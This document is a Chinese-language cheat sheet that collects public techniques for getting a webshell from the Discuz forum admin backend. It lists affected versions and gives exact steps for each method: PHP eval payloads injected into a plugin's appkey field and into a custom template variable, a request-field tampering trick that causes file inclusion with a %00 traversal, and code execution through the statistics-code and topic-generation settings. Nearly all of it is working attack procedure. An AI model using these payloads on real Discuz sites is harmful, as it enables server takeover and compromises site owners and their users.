Discuz后台getshell总结

什么鬼?

收集平时我们可能会用到的所有公开的discuz后台能够getshell的方法

1:利用插件

影响版本

3.2 

后台 – 插件 - 好贷站长联盟 安装之后有一个导入接口信息 导入接口信息填入

appkey 123');eval($_POST[1]);//

/data/dzapp_haodai_config.php 配置文件位置

2:后台文件包含

影响版本

x3 x2

用户 -> 用户栏目 -> 栏目分组 -> 提交 -> 抓包

Content-Disposition:form-data;name="settingnew[profilegroupnew][base][available]"
改为:
Content-Disposition:form-data;name="settingnew[profilegroupnew][plugin][available]"

提交后访问 /home.php?mod=spacecp&id=../../robots.txt%00 实现包含

3:自定义模板变量getwebshell

影响版本

7.0以下不需要管理员权限

/admincp.php?action=styles&operation=edit&id=1&adv=1
中,最下面有个“自定义模板变量”,变量中填

OLDJUN', '#999');eval($_POST[cmd]);//

替换内容随便输入:1111,然后提交,一句话木马就产生了: http://www.oldjun.com/bbs/forumdata/cache/style_1.php 如果存在多个风格,需要修改马的地址为style_2.php

4:discuz3.1后台代码执行

1:全局–〉网站第三方统计代码–〉插入php代码[其他地方<>会被转意]: 如插入

2:工具–〉更新缓存

3:门户–> HTML管理–〉设置

1) 静态文件扩展名[一定要设置成htm] :htm
2) 专题HTML存放目录: template/default/portal

4:门户–〉专题管理–〉创建专题

1)专题标题:xyz // 这个随便你写了
2)静态化名称:portal_topic_222 //222为自定义文件名,自己要记住
3)附加内容:选择上: 站点尾部信息
4) 开始刚才的专题
5)把刚才的专题,生成

5:再新建一个专题

1)专题标题,静态化名称,这2个随便写
2)模板名:这个要选择我们刚才生成的页面:./template/default/portal/portal_topic_222.htm
3)然后提交,就执行了<?php phpinfo();?>